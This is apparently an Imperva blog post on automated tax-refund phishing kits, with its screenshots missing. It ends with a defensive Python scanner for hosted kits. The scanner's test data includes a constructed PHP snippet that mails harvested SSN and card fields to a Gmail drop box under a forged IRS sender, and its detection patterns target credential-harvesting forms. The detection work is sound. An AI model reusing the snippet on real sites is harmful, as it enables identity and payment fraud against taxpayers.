Imperva’s Application Defense Center (ADC) has discovered a new type of online tax scheme. Online schemes that use tax rebates as a lure to steal money have been around for some time and are well documented. However, past attempts have often been manual, tedious efforts. Today’s initiatives feature much more sophisticated, automated tactics. We believe the past success of “getting a bigger refund, earlier” has helped inspire a new set of tools and approaches to defraud consumers.

The current crop of scams affects the UK and the US (there could be more, but our language skills are limited). For context, Americans file taxes between January 1st and April 15th, and rebates are issued during this period. The UK’s tax deadline was January 31st and the window for rebates is currently open.

How Does The Scheme Work?
Although hacker groups operate with the intention of defrauding consumers, it is instructive to describe their attempts from the perspective of both the victim and the hacker.
1. The victim’s perspective — Traditional phishing attempts with a tax-centric theme.

First, the phishing email:

Second, the forged site:

2. The hacker’s perspective — As we’ve seen with Gmail, Yahoo!, and other common phishing schemes, automation was used to reduce the time and cost involved with setup, deployment, and monitoring.

First, the hacker’s code designating a Gmail drop box for stolen credentials:

Second, the code where the hacker designates a false email alias:

Third, the spoofed website:

Fourth, an illustration of the downloadable kits that help hackers set up their schemes:

Fifth, a list of banks the hacker kits provide for spoofing:

Sixth, another example of fake refund portals:

Seventh, a hacker kit to spoof the IRS:

Eighth, a screenshot showing links to spoofed banks set up by the hacker kits:

Avoiding the Schemes
There are two problems associated with this phishing campaign:
1. The target of the phishing scheme, consumers.
2. The unwitting hosts of the phishing scheme, businesses.

Given the persistence and frequency of phishing, especially the resurgence of current tax schemes, we are less hopeful that a consumer-centric solution will have a sufficient impact. Like it or not, this means businesses will have to bear the burden. Considering the real business impact, enterprises need to know if they are hosting a phishing site. Here is an example of how Google labels businesses suspected of hosting a phishing site—a virtual kiss of death:

This current phishing campaign underscores the need for businesses to adopt an effective data and application security approach. To avoid becoming a hosting place for a phishing site, business websites must protect their applications from attacks such as cross-site scripting (XSS) and SQL injection.
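A business that wants to know whether a phishing kit has been dropped onto its web server can look for the artifacts this post describes: a mailer that forwards harvested form data to a hard-coded freemail drop box, an outgoing From: header that forges a tax authority, and a refund-themed page collecting identity or card details. The scanner below is an added example written for this post, not code from Imperva or from any kit; the indicator patterns, the tax-authority domains it checks, the file suffixes it scans and the two sample files it scans are all constructed assumptions, and a real deployment would tune them to the site.

```python
"""Scan a web root for artifacts typical of a hosted tax-refund phishing kit.

Added example for this post. The indicators below are assumptions modelled on
the kit features the post describes (freemail drop box, forged sender alias,
refund-themed credential form); they are heuristics for triage, not proof.
"""
import re
import tempfile
from pathlib import Path

# Server-side and static page types worth scanning (assumption).
SCANNED_SUFFIXES = {".php", ".phtml", ".html", ".htm"}

# Each indicator fires only when ALL of its patterns match the same file.
INDICATORS = [
    # A mail() call plus a quoted freemail address: harvested data mailed out.
    ("freemail_drop_box", [
        re.compile(r'\bmail\s*\(', re.I),
        re.compile(r'[\'"][\w.+-]+@(?:gmail|yahoo|hotmail|outlook)\.com[\'"]', re.I),
    ]),
    # An outgoing From: header claiming a tax-authority domain (assumed list).
    ("forged_tax_authority_sender", [
        re.compile(r'From:\s*[^\r\n\'"]*@(?:irs\.gov|hmrc\.gov\.uk)', re.I),
    ]),
    # Refund-themed wording together with a form field asking for identity
    # or payment details; a login form alone does not count.
    ("refund_credential_form", [
        re.compile(r'\b(?:tax\s+refund|tax\s+rebate|refund\s+portal)\b', re.I),
        re.compile(r'<input[^>]+name\s*=\s*[\'"]?(?:ssn|card(?:number)?|cvv|pin|password|sort_?code)\b', re.I),
    ]),
]


def scan_text(text: str) -> list[str]:
    """Return the names of all indicators whose patterns all match the text."""
    return [name for name, patterns in INDICATORS
            if all(p.search(text) for p in patterns)]


def scan_webroot(root: Path) -> dict[str, list[str]]:
    """Map each flagged file (relative POSIX path) to the indicators it triggered."""
    findings: dict[str, list[str]] = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCANNED_SUFFIXES:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        hits = scan_text(text)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


# Constructed sample modelled on the post's description; not code from any real kit.
KIT_SAMPLE = r"""<?php
$drop = "dropbox.example@gmail.com";
$headers = "From: refunds@irs.gov\r\n";
mail($drop, "result", $_POST['ssn'] . "|" . $_POST['card'], $headers);
?>
<h1>Claim your tax refund</h1>
<form method="post">
  <input name="ssn"> <input name="card"> <input name="cvv">
</form>
"""

# Constructed benign contact form: mails to the site's own domain, no refund theme.
BENIGN_SAMPLE = r"""<?php
mail("support@example.com", "contact", $_POST['message'], "From: web@example.com");
?>
<form method="post"><input name="email"><textarea name="message"></textarea></form>
"""


def demo() -> dict[str, list[str]]:
    """Write the constructed samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "refund").mkdir()
        (root / "refund" / "mailer.php").write_text(KIT_SAMPLE)
        (root / "contact.php").write_text(BENIGN_SAMPLE)
        (root / "style.css").write_text("body { color: #000; }")  # not scanned
        return scan_webroot(root)


if __name__ == "__main__":
    for rel_path, hits in demo().items():
        print(f"{rel_path}: {', '.join(hits)}")
```

Run it against a real document root by calling `scan_webroot(Path("/var/www/html"))` (path is an example). Each indicator requires several conditions to hold in the same file so that a legitimate contact form or a page that merely mentions refunds is not flagged; anything the scanner does report should be confirmed by hand before the file is removed, since the hits are triage signals rather than a verdict.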